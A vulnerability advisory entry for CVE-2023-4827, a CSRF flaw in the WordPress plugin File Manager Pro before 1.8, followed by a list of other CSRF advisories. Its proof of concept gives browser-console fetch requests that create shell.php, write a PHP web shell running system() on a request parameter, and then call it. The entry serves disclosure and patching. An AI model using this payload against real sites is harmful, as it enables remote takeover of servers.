File Manager Pro < 1.8 – Remote Code Execution via CSRF | CVE 2023-4827 | Plugin Vulnerabilities

Description

The plugin does not properly check the CSRF nonce in the `fs_connector` AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.

Proof of Concept

As a Super Admin, run the following code in the browser console (note that the requests do not require nonces):

await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=mkfile&name=shell.php&target=l1_Lw" );
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=put&target=l1_c2hlbGwucGhw&content=%3C?php%20echo%20system($_REQUEST%5B'cmd'%5D);" );

Now a logged-out attacker may access `shell.php` as follows:

await (await fetch( "/shell.php?cmd=id" ) ).text()

Affects Plugins

Fixed in 1.8

References

CVE

URL

https://blog.cleantalk.org/cve-2023-4827-file-manager-pro-1-8-remote-code-execution-via-csrf

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

d4daf0e1-8018-448a-964c-427a355e005f

Timeline

Publicly Published

2023-09-11 (about 2 years ago)

Added

2023-09-11 (about 2 years ago)

Last Updated

2023-09-12 (about 2 years ago)

Other

Published

Title

Published

2023-06-26

Title

POST SMTP Mailer < 2.5.7 - Account Takeover via CSRF

Published

2024-05-31

Title

CB (legacy) <= 0.9.4.18 - Code/Timeframe/Booking Deletion via CSRF

Published

2025-06-12

Title

Responsive Plus < 3.2.3 - Cross-Site Request Forgery to Settings Update

Published

2025-09-05

Title

WP likes <= 3.1.1 - Cross-Site Request Forgery to Cross-Site Scripting

Published

2014-08-01

Title

Cool Video Gallery 1.8 - admin/gallery-sort.php Gallery Sort Order Manipulation CSRF